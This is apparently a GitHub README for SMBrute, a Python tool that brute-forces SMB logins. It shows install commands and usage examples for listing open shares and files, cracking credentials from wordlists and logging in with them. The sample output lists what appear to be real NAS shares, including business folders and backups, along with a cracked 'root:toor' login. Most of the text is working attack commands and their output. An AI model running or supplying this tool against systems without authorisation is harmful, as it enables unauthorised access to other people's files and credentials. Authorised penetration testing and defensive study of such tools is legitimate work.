
SMB Protocol Bruteforce

Primary LanguagePython

SMBrute v0.1.0

SMBrute is a program that can be used to bruteforce username and passwords of servers that are using SMB (Samba).


Install SMBrute

$ git clone https://github.com/m4ll0k/SMBrute.git smbrute
$ cd smbrute
$ pip3 install pysmb, humanfriendly
$ python3 smbrute.py


$ python3 smbrute.py -h
 _____ _____ _____         _       
|   __|     | __  |___ _ _| |_ ___ 
|__   | | | | __ -|  _| | |  _| -_|
|_____|_|_|_|_____|_| |___|_| |___|

SMBrute - SMB Protocol Bruteforce
	Version 0.1.0
    Momo Outaadi (M4ll0k)

[+] Host authentication disabled
[+] Showing folders..
| Name       | Type | Comments                 |
| Multimedia |    0 | System default share     |
| Download   |    0 | System default share     |
| Recordings |    0 | System default share     |
| Web        |    0 | System default share     |
| Public     |    0 | System default share     |
| homes      |    0 | System default share     |
| Archivio   |    0 |                          |
| FTP        |    0 | ftp                      |
| home       |    0 | Home                     |
| Qsync      |    0 | Qsync                    |
| IPC$       |    3 | IPC Service (NAS Server) |

Show Files:

$ python3 smbrute.py -h -f FTP
_____ _____ _____         _       
|   __|     | __  |___ _ _| |_ ___ 
|__   | | | | __ -|  _| | |  _| -_|
|_____|_|_|_|_____|_| |___|_| |___|

SMBrute - SMB Protocol Bruteforce
	Version 0.1.0
    Momo Outaadi (M4ll0k)

[+] Host authentication disabled
[+] Show FTP Files...
| Filename                                     | ReadOnly |
| .                                            | False    |
| ..                                           | False    |
| mLog_27_8_17__23_00_01.csv                   | False    |
| mLog_26_1_18__23_00_01.csv                   | False    |
| mLog_23_1_18__23_00_01.csv                   | False    |
| mLog_28_3_17__23_00_01.csv                   | False    |
| mLog_21_6_17__23_00_01.csv                   | False    |

Bruteforce Login:

$ python3 smbrute.py -h
 _____ _____ _____         _       
|   __|     | __  |___ _ _| |_ ___ 
|__   | | | | __ -|  _| | |  _| -_|
|_____|_|_|_|_____|_| |___|_| |___|

SMBrute - SMB Protocol Bruteforce
	Version 0.1.0
    Momo Outaadi (M4ll0k)

[-] Host authentication enabled
[!] Please set wordlist for bruteforcing

$ python3 smbrute.py -h -U user.txt -P pass.txt -t 10
 _____ _____ _____         _       
|   __|     | __  |___ _ _| |_ ___ 
|__   | | | | __ -|  _| | |  _| -_|
|_____|_|_|_|_____|_| |___|_| |___|

SMBrute - SMB Protocol Bruteforce
	Version 0.1.0
    Momo Outaadi (M4ll0k)

[-] Host authentication enabled
[+] Start bruteforcing...
[+] Username: root Password: toor

After found credentials:

$ python3 smbrute.py -h -u admin -p 1234
 _____ _____ _____         _       
|   __|     | __  |___ _ _| |_ ___ 
|__   | | | | __ -|  _| | |  _| -_|
|_____|_|_|_|_____|_| |___|_| |___|

SMBrute - SMB Protocol Bruteforce
	Version 0.1.0
    Momo Outaadi (M4ll0k)

[+] Host authentication disabled
[+] Showing folders..
| Name                   | Type | Comments                      |
| IPC$                   |    3 | IPC Service (WDMyCloudEX2100) |
| Recycle Bin - Volume_1 |    0 | Recycle Bin Directories       |
| serverconf             |    0 |                               |
| deleghe2               |    0 |                               |
| prova                  |    0 |                               |
| ebcs_site              |    0 |                               |
| deleghe                |    0 |                               |
| confcatania2           |    0 |                               |
| backup                 |    0 |                               |
| doc                    |    0 | doc                           |
| ebcs                   |    0 | ebcs                          |
| foto                   |    0 | foto                          |
| pratiche               |    0 |                               |
| TimeMachineBackup      |    0 |                               |
| SmartWare              |    0 |                               |
| Public                 |    0 |                               |